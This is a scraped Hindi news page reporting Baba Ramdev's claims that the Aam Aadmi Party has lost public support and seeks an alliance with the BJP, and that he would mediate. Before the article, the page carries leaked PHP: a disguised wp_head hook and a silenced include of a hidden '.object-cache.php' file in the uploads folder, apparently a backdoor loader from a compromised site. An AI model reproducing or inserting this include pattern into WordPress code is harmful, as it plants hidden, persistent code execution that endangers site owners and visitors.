add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बीजेपी के साथ जुड़ना चाहती है ‘आप’: रामदेव – SOCH INDIA
Menu

देश
बीजेपी के साथ जुड़ना चाहती है ‘आप’: रामदेव

nobanner

योगगुरु बाबा रामदेव ने आज कहा कि आम आदमी पार्टी (आप) ने जनता का समर्थन खो दिया है और अरविंद केजरीवाल नीत पार्टी अब बीजेपी के साथ हाथ मिलाने के रास्ते तलाश रही है.
रामदेव ने यहां एक संवाददाता सम्मेलन में कहा कि आम आदमी पार्टी बीजेपी के साथ हाथ मिलाना चाहते हैं, उनके हालात डांवाडोल हैं और उन्होंने जनता का समर्थन खो दिया है. यह पूछे जाने पर कि अगर केजरीवाल बीजेपी के साथ हाथ मिलाने को लेकर झुकाव दिखाते हैं तो क्या इस स्थिति में वह मध्यस्थता करेंगे, योगगुरु ने कहा कि अगर केजरीवाल मोदी का समर्थन करते हैं तो निश्चित रूप से मैं मध्यस्थता करने को तैयार हूं.

रामदेव ने कहा कि वह इससे पहले भ्रष्टाचार के मुद्दे पर दिल्ली के मुख्यमंत्री केजरीवाल का समर्थन कर चुके हैं, क्योंकि ‘आप’ नेता ने तब व्यवस्था को साफ करने की ठानी थी, लेकिन अब उन्‍हें इसका पछतावा है क्योंकि केजरीवाल अपनी राह से भटक गए हैं. ‘आप’ की आलोचना करते हुए रामदेव ने कहा कि अभी तक ‘आप’ की विचारधारा, नीतियां और सिद्धांत स्पष्ट नहीं हुए हैं. रामदेव ने कहा कि वह खुद ही उलझन में हैं कि वह दक्षिणपंथी हैं, वामपंथी हैं या कम्युनिस्ट, राष्ट्रवादी हैं या अवसरवादी, वह क्या है, यह स्पष्ट नहीं है.

हमें पता नहीं है कि उनकी आर्थिक नीतियां कैसी हैं, विदेश नीति, कृषि नीति पर उनकी क्या राय है, उन्हें इसके बारे में सोचने का समय नहीं मिल रहा, क्योंकि उनका एकमात्र एजेंडा मोदी को खत्म करना है. रामदेव ने कहा कि गरीब जनता जिसे लगा था कि केजरीवाल उनके मसीहा होंगे, वह अब खुद को ठगा महसूस कर रही है.